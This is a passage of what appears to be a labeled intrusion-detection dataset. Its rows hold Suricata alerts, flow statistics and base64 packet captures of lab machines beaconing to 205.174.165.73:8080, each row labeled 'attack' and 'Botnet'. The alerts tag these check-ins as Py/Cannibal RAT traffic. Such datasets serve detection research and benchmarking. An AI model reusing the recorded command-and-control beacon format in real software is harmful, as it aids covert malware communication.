'205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:48.408861+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPghAAIAGfx7AqAoJza6lSQq9H5AO1fnlNXuQU1ARAQB4UwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,594 |
192.168.10.14-51609-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4516494, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:51 | 73,751 | Friday | [{'timestamp': '2017-07-07T13:27:51.171313+0000', 'flow_id': 186008798199714, 'pcap_cnt': 4516494, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51609, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:51.098210+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGXJAAIAGo6/AqAoOza6lScmZH5CsloCDzC2zRFARAQDbbgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:51.171313+0000', 'flow_id': 186008798199714, 'pcap_cnt': 4516494, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51609, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:51.098210+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGXJAAIAGo6/AqAoOza6lScmZH5CsloCDzC2zRFARAQDbbgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,653 |
192.168.10.15-52311-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4517398, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:52 | 72,148 | Friday | [{'timestamp': '2017-07-07T13:27:52.746179+0000', 'flow_id': 1185726860905334, 'pcap_cnt': 4517398, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52311, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:52.674678+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob0dAAIAGTdnAqAoPza6lScxXH5CGOTOMvcXi21ARAQAq1QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:52.746179+0000', 'flow_id': 1185726860905334, 'pcap_cnt': 4517398, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52311, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:52.674678+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob0dAAIAGTdnAqAoPza6lScxXH5CGOTOMvcXi21ARAQAq1QAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,741 |
192.168.10.9-2750-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4520022, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:58 | 85,396 | Friday | [{'timestamp': '2017-07-07T13:27:58.570985+0000', 'flow_id': 520217383824443, 'pcap_cnt': 4520022, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2750, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:58.486459+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPhBAAIAGfxbAqAoJza6lSQq+H5Ap4KxARl7c71ARAQBNbQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:58.570985+0000', 'flow_id': 520217383824443, 'pcap_cnt': 4520022, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2750, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:58.486459+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPhBAAIAGfxbAqAoJza6lSQq+H5Ap4KxARl7c71ARAQBNbQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,903 |
192.168.10.14-51610-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4521498, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:01 | 64,569 | Friday | [{'timestamp': '2017-07-07T13:28:01.237785+0000', 'flow_id': 2022944836527936, 'pcap_cnt': 4521498, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51610, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:01.173888+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGXdAAIAGo6rAqAoOza6lScmaH5C9EzC5AMQAiVARAQCY4AAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:01.237785+0000', 'flow_id': 2022944836527936, 'pcap_cnt': 4521498, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51610, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:01.173888+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGXdAAIAGo6rAqAoOza6lScmaH5C9EzC5AMQAiVARAQCY4AAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,251,041 |
192.168.10.15-52312-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4522377, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:28:02 | 64,425 | Friday | [{'timestamp': '2017-07-07T13:28:02.812827+0000', 'flow_id': 672001528327833, 'pcap_cnt': 4522377, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52312, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:28:02.749209+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob0xAAIAGTdTAqAoPza6lScxYH5D03yW7MuqiQFARAQCVdQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:28:02.812827+0000', 'flow_id': 672001528327833, 'pcap_cnt': 4522377, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52312, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 